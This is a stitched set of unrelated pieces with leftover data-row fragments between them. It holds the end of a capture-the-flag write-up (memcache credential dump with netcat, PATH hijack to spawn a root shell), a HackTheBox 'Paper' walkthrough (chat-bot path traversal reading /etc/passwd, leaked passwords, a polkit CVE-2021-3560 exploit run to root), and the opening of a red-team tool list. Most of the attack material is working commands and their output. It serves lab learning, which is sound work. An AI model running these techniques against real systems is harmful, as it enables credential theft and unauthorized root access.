0 0 127.0.0.1:3010 0.0.0.0:* LISTEN - \ntcp6 0 0 :::80 :::* LISTEN - \ntcp6 0 0 :::22 :::* LISTEN - \ntcp6 0 0 ::1:631 :::* LISTEN - \n~~~\n\nAfter some reasearch on the Internet, I found [this post](https://book.hacktricks.xyz/pentesting/11211-memcache) about memcache. Let's check if we can dump cached information:\n\n~~~\nwww-data@osboxes:/$ echo \"stats items\" | nc -vn -w 1 127.0.0.1 11211\necho \"stats items\" | nc -vn -w 1 127.0.0.1 11211\nConnection to 127.0.0.1 11211 port [tcp/*] succeeded!\nSTAT items:1:number 5\nSTAT items:1:age 1361\nSTAT items:1:evicted 0\nSTAT items:1:evicted_nonzero 0\nSTAT items:1:evicted_time 0\nSTAT items:1:outofmemory 0\nSTAT items:1:tailrepairs 0\nSTAT items:1:reclaimed 0\nSTAT items:1:expired_unfetched 0\nSTAT items:1:evicted_unfetched 0\nSTAT items:1:crawler_reclaimed 0\nSTAT items:1:crawler_items_checked 0\nSTAT items:1:lrutail_reflocked 0\nEND\nwww-data@osboxes:/$ echo \"stats cachedump 1 0\" | nc -vn -w 1 127.0.0.1 11211\necho \"stats cachedump 1 0\" | nc -vn -w 1 127.0.0.1 11211\nConnection to 127.0.0.1 11211 port [tcp/*] succeeded!\nITEM id [4 b; 1620801753 s]\nITEM email [14 b; 1620801753 s]\nITEM salary [8 b; 1620801753 s]\nITEM password [15 b; 1620801753 s]\nITEM username [4 b; 1620801753 s]\nEND\nwww-data@osboxes:/$ echo \"get username\" | nc -vn -w 1 127.0.0.1 11211\necho \"get username\" | nc -vn -w 1 127.0.0.1 11211\nConnection to 127.0.0.1 11211 port [tcp/*] succeeded!\nVALUE username 0 4\nOrka\nEND\nwww-data@osboxes:/$ echo \"get password\" | nc -vn -w 1 127.0.0.1 11211\necho \"get password\" | nc -vn -w 1 127.0.0.1 11211\nConnection to 127.0.0.1 11211 port [tcp/*] succeeded!\nVALUE password 0 15\nOrkAiSC00L24/7$\nEND\nwww-data@osboxes:/$ \n~~~\n\nWe have been able to get Orka's password: `OrkAiSC00L24/7$`\n\n## User flag\n\nConnect as `Orka` and get the user flag:\n\n~~~\nwww-data@osboxes:/$ su Orka\nsu Orka\nPassword: OrkAiSC00L24/7$\n\nOrka@osboxes:~$ cat /home/Orka/user.txt\n1a26a6d51c0172400add0e297608dec6\n~~~\n\nUser flag: `1a26a6d51c0172400add0e297608dec6`\n\n# Root flag\n\n## Orka's privileges\n\nOrka can run a `bitcoin` binary as `root` with `sudo`.\n\n~~~\nOrka@osboxes:~/.ssh$ sudo -l\nsudo -l\n[sudo] password for Orka: OrkAiSC00L24/7$\n\nMatching Defaults entries for Orka on osboxes:\n env_reset, mail_badpass,\n secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser Orka may run the following commands on osboxes:\n (root) /home/Orka/Desktop/bitcoin\n~~~\n\nChecking the directory where this binary lands reveals a python script:\n\n~~~\nOrka@osboxes:~/Desktop$ ll\nll\ntotal 20\ndrwxrwxr-x 2 root root 4096 Jan 23 17:45 ./\ndrwxr-xr-- 19 Orka Orka 4096 May 12 03:51 ../\n-rwxr-xr-x 1 root root 7696 Jan 23 15:23 bitcoin*\n-rwxr--r-- 1 root root 588 Jan 23 14:27 transfer.py*\n~~~\n\nRunning `strings` against the binary will reveal the expected password (`password`). Let's run it:\n\n~~~\nOrka@osboxes:~/Desktop$ ./bitcoin\n./bitcoin\nEnter the password : password\npassword\nAccess Granted...\n User Manual: \nMaximum Amount Of BitCoins Possible To Transfer at a time : 9 \nAmounts with more than one number will be stripped off! \nAnd Lastly, be careful, everything is logged :) \nAmount Of BitCoins : 20\n20\nSaving 2 BitCoin(s) For Later Use \nDo you want to make a transfer? Y/N : Y\nY\nTransfering 2 BitCoin(s) \nTransfer Completed Successfully...\n~~~\n\n## Reverse engineering (bitcoin, transfer.py)\n\nGet a copy of both files and analyze the binary in Hopper to get the following pseudo code. We see that the binary calls a python script (`transfer.py`) with a relative path:\n\n```c\nint main(int arg0) {\n ebp = &stack[-8];\n *(ebp - 0xc) = *0x14;\n printf(\"Enter the password : \");\n gets(ebp - 0x7f);\n esp = ((((esp & 0xfffffff0) - 0xa0) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10;\n if (strcmp(ebp - 0x7f, \"password\") != 0x0) {\n puts(\"Access Denied... \");\n }\n else {\n puts(\"Access Granted...\");\n sleep(0x1);\n puts(\"\\t\\t\\tUser Manual:\\t\\t\\t\");\n puts(\"Maximum Amount Of BitCoins Possible To Transfer at a time : 9 \");\n puts(\"Amounts with more than one number will be stripped off! \");\n puts(\"And Lastly, be careful, everything is logged :) \");\n printf(\"Amount Of BitCoins : \");\n __isoc99_scanf(0x804893b);\n esp = ((((((((esp - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10;\n eax = __ctype_b_loc();\n eax = *eax;\n edx = *(int8_t *)(ebp - 0x80) & 0xff;\n if ((*(int16_t *)(eax + sign_extend_32(edx) + sign_extend_32(edx)) & 0xffff & 0xffff & 0x800) == 0x0) {\n puts(\"\\n Sorry, This is not a valid amount! \");\n }\n else {\n sprintf(ebp - 0x70, \"python /home/Orka/Desktop/transfer.py %c\", sign_extend_32(*(int8_t *)(ebp - 0x80) & 0xff));\n system(ebp - 0x70);\n }\n }\n ecx = *(ebp - 0xc);\n ecx = ecx ^ *0x14;\n if (ecx != 0x0) {\n eax = __stack_chk_fail();\n }\n else {\n eax = 0x0;\n }\n return eax;\n}\n```\n\nThe python script is as follows:\n\n```python\nOrka@osboxes:~/Desktop$ cat transfer.py\ncat transfer.py\nimport time\nimport socket\nimport sys\nimport os\n\nresult = sys.argv[1]\n\nprint \"Saving \" + result + \" BitCoin(s) For Later Use \"\n\ntest = raw_input(\"Do you want to make a transfer? Y/N : \")\n\nif test == \"Y\":\n try:\n print \"Transfering \" + result + \" BitCoin(s) \"\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n connect = s.connect((\"127.0.0.1\",3010))\n s.send(\"Transfer : \" + result + \"To https://transfer.bitcoins.com\")\n time.sleep(2.5)\n print (\"Transfer Completed Successfully...\")\n time.sleep(1)\n s.close()\n except:\n print(\"Error!\")\nelse:\n print(\"Quitting...\")\n time.sleep(1)\n```\n\n## Hijack the python binary\n\nAs `python` is called with a relative path, we can hijack the python binary. Checking the `PATH` environment variable:\n\n~~~\nOrka@osboxes:/$ echo $PATH\necho $PATH\n/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games\n~~~\n\nWrite access to /usr/sbin:\n\n~~~\nOrka@osboxes:/$ ls -la /usr/sbin/ | head\nls -la /usr/sbin/ | head\ntotal 41284\ndrwxrwxr-x 2 root Orka 12288 Jan 23 16:01 . <----------------- write access\ndrwxr-xr-x 11 root root 4096 Feb 26 2019 ..\nlrwxrwxrwx 1 root root 7 Aug 12 2020 a2disconf -> a2enmod\nlrwxrwxrwx 1 root root 7 Aug 12 2020 a2dismod -> a2enmod\nlrwxrwxrwx 1 root root 7 Aug 12 2020 a2dissite -> a2enmod\nlrwxrwxrwx 1 root root 7 Aug 12 2020 a2enconf -> a2enmod\n-rwxr-xr-x 1 root root 15424 Jul 15 2020 a2enmod\nlrwxrwxrwx 1 root root 7 Aug 12 2020 a2ensite -> a2enmod\n-rwxr-xr-x 1 root root 9870 Aug 12 2020 a2query\nls: write error: Broken pipe\n~~~\n\nLet's write a fake `python` binary in `/usr/bin/` that will spawn a root shell:\n\n~~~\n$ cat > /usr/sbin/python << EOF\n#!/bin/bash\n/bin/bash\nEOF\n$ chmod +x /usr/sbin/python\n~~~\n\n## Root access\n\nNow, running the program will spawn a root shell and we can get the root flag:\n\n~~~\nOrka@osboxes:/$ cat > /usr/sbin/python << EOF\n#!/bin/bash\n/bin/bash\nEOF\ncat > /usr/sbin/python << EOF\n> #!/bin/bash\n> /bin/bash\n> EOF\nOrka@osboxes:/$ chmod +x /usr/sbin/python\nchmod +x /usr/sbin/python\nOrka@osboxes:/$ sudo /home/Orka/Desktop/bitcoin\nsudo /home/Orka/Desktop/bitcoin\nEnter the password : password\npassword\nAccess Granted...\n User Manual: \nMaximum Amount Of BitCoins Possible To Transfer at a time : 9 \nAmounts with more than one number will be stripped off! \nAnd Lastly, be careful, everything is logged :) \nAmount Of BitCoins : 20\n20\nroot@osboxes:/# id\nid\nuid=0(root) gid=0(root) groups=0(root)\nroot@osboxes:/# cat /root/root.txt\ncat /root/root.txt\nf4e788f87cc3afaecbaf0f0fe9ae6ad7\n~~~\n\nRoot flag: `f4e788f87cc3afaecbaf0f0fe9ae6ad7`\n"}}},{"rowIdx":313,"cells":{"text":{"kind":"error","message":"ERROR: type should be string, got \"https://app.hackthebox.com/machines/Paper\\n\\n```\\n─[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\\n└──╼ [★]$ nmap 10.129.72.199\\nStarting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 04:47 BST\\nNmap scan report for 10.129.72.199\\nHost is up (0.26s latency).\\nNot shown: 997 closed tcp ports (conn-refused)\\nPORT STATE SERVICE\\n22/tcp open ssh\\n80/tcp open http\\n443/tcp open https\\n\\n\\n```\\n\\n```\\n[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\\n└──╼ [★]$ nikto -h 10.129.72.199\\n- Nikto v2.1.6\\n---------------------------------------------------------------------------\\n+ Target IP: 10.129.72.199\\n+ Target Hostname: 10.129.72.199\\n+ Target Port: 80\\n+ Start Time: 2022-06-13 04:54:30 (GMT1)\\n---------------------------------------------------------------------------\\n+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9\\n+ The anti-clickjacking X-Frame-Options header is not present.\\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\\n+ Uncommon header 'x-backend-server' found, with contents: office.paper\\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\\n+ Retrieved x-powered-by header: PHP/7.2.24\\n+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE \\n+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST\\n\\n```\\n\\nwhen you change the hostname to office.paper we see a new site pop up.\\n\\nwpscan result:\\n```\\n─[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\\n└──╼ [★]$ wpscan --url http://office.paper\\n_______________________________________________________________\\n __ _______ _____\\n \\\\ \\\\ / / __ \\\\ / ____|\\n \\\\ \\\\ /\\\\ / /| |__) | (___ ___ __ _ _ __ ®\\n \\\\ \\\\/ \\\\/ / | ___/ \\\\___ \\\\ / __|/ _` | '_ \\\\\\n \\\\ /\\\\ / | | ____) | (__| (_| | | | |\\n \\\\/ \\\\/ |_| |_____/ \\\\___|\\\\__,_|_| |_|\\n\\n WordPress Security Scanner by the WPScan Team\\n Version 3.8.17\\n Sponsored by Automattic - https://automattic.com/\\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\\n_______________________________________________________________\\n\\n[+] URL: http://office.paper/ [10.129.72.199]\\n[+] Started: Mon Jun 13 05:10:17 2022\\n\\nInteresting Finding(s):\\n\\n[+] Headers\\n | Interesting Entries:\\n | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9\\n | - X-Powered-By: PHP/7.2.24\\n | - X-Backend-Server: office.paper\\n | Found By: Headers (Passive Detection)\\n | Confidence: 100%\\n\\n[+] WordPress readme found: http://office.paper/readme.html\\n | Found By: Direct Access (Aggressive Detection)\\n | Confidence: 100%\\n\\n[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).\\n | Found By: Rss Generator (Passive Detection)\\n | - http://office.paper/index.php/feed/, https://wordpress.org/?v=5.2.3\\n | - http://office.paper/index.php/comments/feed/, https://wordpress.org/?v=5.2.3\\n\\n[+] WordPress theme in use: construction-techup\\n | Location: http://office.paper/wp-content/themes/construction-techup/\\n | Last Updated: 2021-07-17T00:00:00.000Z\\n | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt\\n | [!] The version is out of date, the latest version is 1.4\\n | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1\\n | Style Name: Construction Techup\\n | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...\\n | Author: wptexture\\n | Author URI: https://testerwp.com/\\n |\\n | Found By: Css Style In Homepage (Passive Detection)\\n |\\n | Version: 1.1 (80% confidence)\\n | Found By: Style (Passive Detection)\\n | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'\\n\\n[+] Enumerating All Plugins (via Passive Methods)\\n\\n[i] No plugins Found.\\n\\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\\n Checking Config Backups - Time: 00:00:07 <=> (137 / 137) 100.00% Time: 00:00:07\\n\\n[i] No Config Backups Found.\\n\\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\\n[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register\\n\\n[+] Finished: Mon Jun 13 05:10:38 2022\\n[+] Requests Done: 169\\n[+] Cached Requests: 5\\n[+] Data Sent: 41.636 KB\\n[+] Data Received: 167.972 KB\\n[+] Memory used: 233.637 MB\\n[+] Elapsed time: 00:00:20\\n\\n```\\n\\nuses insecure wordpress version\\n\\nWordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts\\nDescription\\nThis vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.\\nProof of Concept\\nhttp://wordpress.local/?static=1&order=asc \\n\\nlooking at the chats:\\n\\nhttp://chat.office.paper/register/8qozr226AhkCHZdyY\\n\\nthe pwnbox machine stopped here.\\n\\nin rocket chat you can interact with the bot itself\\n\\n```\\n kellylikescupcakes Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.\\nMost frequently asked questions include:\\n- What time is it?\\n- What new files are in your sales directory?\\n- Why did the salesman crossed the road?\\n- What's the content of file x in your sales directory? etc.\\nPlease note that I am a beta version and I still have some bugs to be fixed.\\nHow to use me ? :\\n1. Small Talk:\\nYou can ask me how dwight's weekend was, or did he watched the game last night etc.\\neg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?\\n2. Joke:\\nYou can ask me Why the salesman crossed the road.\\neg: 'recyclops why did the salesman crossed the road?'\\n<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>\\nFor security reasons, the access is limited to the Sales folder.\\n3. Files:\\neg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'\\n4. List:\\nYou can ask me to list the files\\n5. Time:\\nYou can ask me to what the time is\\neg: 'recyclops what time is it?' or just 'recyclops time'\\n\\n```\\n\\nso you can get directory listing\\n\\n```\\n\\n Fetching the directory listing of ../../../../../etc/passwd\\n-rw-r--r--. 1 root root 2842 Jan 13 10:56 /home/dwight/sales/../../../../../etc/passwd\\n\\nroot❌0:0:root:/root:/bin/bash\\nbin❌1:1:bin:/bin:/sbin/nologin\\ndaemon❌2:2:daemon:/sbin:/sbin/nologin\\nadm❌3:4:adm:/var/adm:/sbin/nologin\\nlp❌4:7:lp:/var/spool/lpd:/sbin/nologin\\nsync❌5:0:sync:/sbin:/bin/sync\\nshutdown❌6:0:shutdown:/sbin:/sbin/shutdown\\nhalt❌7:0:halt:/sbin:/sbin/halt\\nmail❌8:12:mail:/var/spool/mail:/sbin/nologin\\noperator❌11:0:operator:/root:/sbin/nologin\\ngames❌12💯games:/usr/games:/sbin/nologin\\nftp❌14:50:FTP User:/var/ftp:/sbin/nologin\\nnobody❌65534:65534:Kernel Overflow User:/:/sbin/nologin\\ndbus❌81:81:System message bus:/:/sbin/nologin\\nsystemd-coredump❌999:997:systemd Core Dumper:/:/sbin/nologin\\nsystemd-resolve❌193:193:systemd Resolver:/:/sbin/nologin\\ntss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\\npolkitd❌998:996:User for polkitd:/:/sbin/nologin\\ngeoclue❌997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin\\nrtkit❌172:172:RealtimeKit:/proc:/sbin/nologin\\nqemu❌107:107:qemu user:/:/sbin/nologin\\napache❌48:48:Apache:/usr/share/httpd:/sbin/nologin\\ncockpit-ws❌996:993:User for cockpit-ws:/:/sbin/nologin\\npulse❌171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin\\nusbmuxd❌113:113:usbmuxd user:/:/sbin/nologin\\nunbound❌995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin\\nrpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\\ngluster❌994:989:GlusterFS daemons:/run/gluster:/sbin/nologin\\nchrony❌993:987::/var/lib/chrony:/sbin/nologin\\nlibstoragemgmt❌992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin\\nsaslauth❌991:76:Saslauthd user:/run/saslauthd:/sbin/nologin\\ndnsmasq❌985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin\\nradvd❌75:75:radvd user:/:/sbin/nologin\\nclevis❌984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin\\npegasus❌66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin\\nsssd❌983:981:User for sssd:/:/sbin/nologin\\ncolord❌982:980:User for colord:/var/lib/colord:/sbin/nologin\\nrpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin\\nsetroubleshoot❌981:979::/var/lib/setroubleshoot:/sbin/nologin\\npipewire❌980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin\\ngdm❌42:42::/var/lib/gdm:/sbin/nologin\\ngnome-initial-setup❌979:977::/run/gnome-initial-setup/:/sbin/nologin\\ninsights❌978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin\\nsshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\\navahi❌70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin\\ntcpdump❌72:72::/:/sbin/nologin\\nmysql❌27:27:MySQL Server:/var/lib/mysql:/sbin/nologin\\nnginx❌977:975:Nginx web server:/var/lib/nginx:/sbin/nologin\\nmongod❌976:974:mongod:/var/lib/mongo:/bin/false\\nrocketchat❌1001:1001::/home/rocketchat:/bin/bash\\ndwight❌1004:1004::/home/dwight:/bin/bash\\n\\n```\\n\\n```\\n \\nexport ROCKETCHAT_URL='http://127.0.0.1:48320'\\nexport ROCKETCHAT_USER=recyclops\\nexport ROCKETCHAT_PASSWORD=Queenofblad3s!23\\nexport ROCKETCHAT_USESSL=false\\nexport RESPOND_TO_DM=true\\nexport RESPOND_TO_EDITED=true\\nexport PORT=8000\\nexport BIND_ADDRESS=127.0.0.1\\n\\n```\\n\\nssh into user using the id\\n\\n```\\n[dwight@paper ~]$ ls\\nbot_restart.sh hubot sales user.txt\\n[dwight@paper ~]$ cat user.txt\\n84c440ab09c9089e6873da2417576300\\n[dwight@paper ~]$ \\n```\\n\\nfor root\\n```\\n┌──(kali㉿kali)-[~]\\n└─$ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh\\n % Total % Received % Xferd Average Speed Time Time Time Current\\n Dload Upload Total Spent Left Speed\\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\\n 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0\\n100 758k 100 758k 0 0 136k 0 0:00:05 0:00:05 --:--:-- 172k\\n\\n```\\n```\\n┌──(kali㉿kali)-[~]\\n└─$ scp linpeas.sh dwight@office.paper:linpeas.sh\\nThe authenticity of host 'office.paper (10.129.128.121)' can't be established.\\nECDSA key fingerprint is SHA256:2eiFA8VFQOZukubwDkd24z/kfLkdKlz4wkAa/lRN3Lg.\\nAre you sure you want to continue connecting (yes/no/[fingerprint])? yes\\nWarning: Permanently added 'office.paper' (ECDSA) to the list of known hosts.\\ndwight@office.paper's password: \\nPermission denied, please try again.\\ndwight@office.paper's password: \\nPermission denied, please try again.\\ndwight@office.paper's password: \\nlinpeas.sh \\n\\n```\\n1583c9698e80c14d2fe148f9eef37289\\n\\nrunning linpeas to find vuln\\n\\n```\\n[dwight@paper ~]$ python3 explot.py\\n**************\\nExploit: Privilege escalation with polkit - CVE-2021-3560\\nExploit code written by Ahmad Almorabea @almorabea\\nOriginal exploit author: Kevin Backhouse \\nFor more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\\n**************\\n[+] Starting the Exploit \\n[+] User Created with the name of ahmed\\n[+] Timed out at: 0.006805316214353887\\n[+] Timed out at: 0.00775959879493205\\n[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root \\n\\nWe trust you have received the usual lecture from the local System\\nAdministrator. It usually boils down to these three things:\\n\\n #1) Respect the privacy of others.\\n #2) Think before you type.\\n #3) With great power comes great responsibility.\\n\\nbash: cannot set terminal process group (95164): Inappropriate ioctl for device\\nbash: no job control in this shell\\n[root@paper dwight]# whoami\\nroot\\n[root@paper dwight]# ls\\nbot_restart.sh explot.py hubot linpeas.sh sales user.txt xp.sh\\n[root@paper dwight]# cat /root/root.txt\\n1583c9698e80c14d2fe148f9eef37289\\n````\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""}}},{"rowIdx":314,"cells":{"text":{"kind":"string","value":"# Red Teaming Toolkit\n\nThis repository contains cutting-edge open-source security tools (OST) that will help you during adversary simulation and as information intended for threat hunter can make detection and prevention control easier. The list of tools below that could be potentially misused by threat actors such as APT and Human-Operated Ransomware (HumOR). If you want to contribute to this list send me a pull request.\n\n---\n\n## Table of Contents\n - [Reconnaissance](#Reconnaissance)\n - [Initial Access](#Initial-Access)\n - [Delivery](#Delivery)\n - [Situational Awareness](#situational-awareness)\n - [Credential Dumping](#credential-dumping)\n - [Privilege Escalation](#privilege-escalation)\n - [Defense Evasion](#defense-evasion)\n - [Persistence](#persistence)\n - [Lateral Movement](#lateral-movement)\n - [Exfiltration](#exfiltration)\n - [Miscellaneous](#miscellaneous)\n\n---\n\n## Reconnaissance\n|Name|Description|URL|\n|-----|-----------|----|\n|RustScan|The Modern Port Scanner. Find ports quickly (3 seconds at its fastest). Run scripts through our scripting engine (Python, Lua, Shell supported).|https://github.com/RustScan/RustScan|\n|Amass|In-depth Attack Surface Mapping and Asset Discovery|https://github.com/OWASP/Amass|\n|gitleaks|Gitleaks is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repos.|https://github.com/zricethezav/gitleaks|\n|S3Scanner|Scan for open S3 buckets and dump the contents|https://github.com/sa7mon/S3Scanner|\n|cloud_enum|Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.|https://github.com/initstring/cloud_enum|\n|Recon-ng|Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.|https://github.com/lanmaster53/recon-ng|\n|buster|An advanced tool for email reconnaissance|https://github.com/sham00n/buster|\n|linkedin2username|OSINT Tool: Generate username lists for companies on LinkedIn|https://github.com/initstring/linkedin2username|\n|WitnessMe|Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.|https://github.com/byt3bl33d3r/WitnessMe|\n|pagodo|pagodo (Passive Google Dork) - Automate Google Hacking Database scraping and searching|https://github.com/opsdisk/pagodo|\n|AttackSurfaceMapper|AttackSurfaceMapper is a tool that aims to automate the reconnaissance process.|https://github.com/superhedgy/AttackSurfaceMapper|\n|SpiderFoot|SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.|https://github.com/smicallef/spiderfoot|\n|dnscan|dnscan is a python wordlist-based DNS subdomain scanner.|https://github.com/rbsec/dnscan|\n|spoofcheck|A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing.|https://github.com/BishopFox/spoofcheck|\n|LinkedInt|LinkedIn Recon Tool|https://github.com/vysecurity/LinkedInt|\n\n## Initial Access\n\n### Brute Force\n|Name|Description|URL|\n|-----|-----------|----|\n|SprayingToolkit|Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient|https://github.com/byt3bl33d3r/SprayingToolkit|\n|o365recon|Retrieve information via O365 with a valid cred|https://github.com/nyxgeek/o365recon|\n|CredMaster|Refactored & improved CredKing password spraying tool, uses FireProx APIs to rotate IP addresses, stay anonymous, and beat throttling|https://github.com/knavesec/CredMaster|\n\n### Payload Development\n|Name|Description|URL|\n|-----|-----------|----|\n|Ivy|Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory.|https://github.com/optiv/Ivy|\n|PEzor|Open-Source PE Packer|https://github.com/phra/PEzor|\n|GadgetToJScript|A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts.|https://github.com/med0x2e/GadgetToJScript|\n|ScareCrow|Payload creation framework designed around EDR bypass.|https://github.com/optiv/ScareCrow|\n|Donut|Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. |https://github.com/TheWover/donut|\n|Mystikal|macOS Initial Access Payload Generator|https://github.com/D00MFist/Mystikal|\n|charlotte|c++ fully undetected shellcode launcher ;)|https://github.com/9emin1/charlotte|\n|InvisibilityCloak|Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio project.|https://github.com/xforcered/InvisibilityCloak|\n|Dendrobate|Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code.|https://github.com/FuzzySecurity/Dendrobate|\n|Offensive VBA and XLS Entanglement|This repo provides examples of how VBA can be used for offensive purposes beyond a simple dropper or shell injector. As we develop more use cases, the repo will be updated.|https://github.com/BC-SECURITY/Offensive-VBA-and-XLS-Entanglement|\n|xlsGen|Tiny Excel BIFF8 Generator, to Embedded 4.0 Macros in *.xls|https://github.com/aaaddress1/xlsGen|\n|darkarmour|Windows AV Evasion|https://github.com/bats3c/darkarmour|\n|InlineWhispers|Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)|https://github.com/outflanknl/InlineWhispers|\n|EvilClippy|A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.|https://github.com/outflanknl/EvilClippy|\n|OfficePurge|VBA purge your Office documents with OfficePurge. VBA purging removes P-code from module streams within Office documents.|https://github.com/fireeye/OfficePurge|\n|ThreatCheck|Identifies the bytes that Microsoft Defender / AMSI Consumer flags on.|https://github.com/rasta-mouse/ThreatCheck|\n|CrossC2|Generate CobaltStrike's cross-platform payload|https://github.com/gloxec/CrossC2|\n|Ruler|Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol.|https://github.com/sensepost/ruler|\n|DueDLLigence|Shellcode runner framework for application whitelisting bypasses and DLL side-loading. The shellcode included in this project spawns calc.exe.|https://github.com/fireeye/DueDLLigence|\n|RuralBishop|RuralBishop is practically a carbon copy of UrbanBishop by b33f, but all P/Invoke calls have been replaced with D/Invoke.|https://github.com/rasta-mouse/RuralBishop|\n|TikiTorch|TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process, allocates a region of memory, then uses CreateRemoteThread to run the desired shellcode within that target process. Both the process and shellcode are specified by the user.|https://github.com/rasta-mouse/TikiTorch|\n|SharpShooter|SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF.|https://github.com/mdsecactivebreach/SharpShooter|\n|SharpSploit|SharpSploit is a .NET post-exploitation library written in C#|https://github.com/cobbr/SharpSploit|\n|MSBuildAPICaller|MSBuild Without MSBuild.exe|https://github.com/rvrsh3ll/MSBuildAPICaller|\n|macro_pack|macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of MS Office documents, VB scripts, and other formats for pentest, demo, and social engineering assessments.|https://github.com/sevagas/macro_pack|\n|inceptor|Template-Driven AV/EDR Evasion Framework|https://github.com/klezVirus/inceptor|\n|mortar|evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)|https://github.com/0xsp-SRD/mortar|\n|ProtectMyTooling|Multi-Packer wrapper letting us daisy-chain various packers, obfuscators and other Red Team oriented weaponry. Featured with artifacts watermarking, IOCs collection & PE Backdooring. You feed it with your implant, it does a lot of sneaky things and spits out obfuscated executable.|https://github.com/mgeeky/ProtectMyTooling|\n|Freeze|Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods|https://github.com/optiv/Freeze|\n\n## Delivery\n### Phishing\n|Name|Description|URL|\n|-----|-----------|----|\n|o365-attack-toolkit|A toolkit to attack Office365|https://github.com/mdsecactivebreach/o365-attack-toolkit|\n|Evilginx2|Evilginx2 is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service.|https://github.com/kgretzky/evilginx2|\n|Gophish|Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup 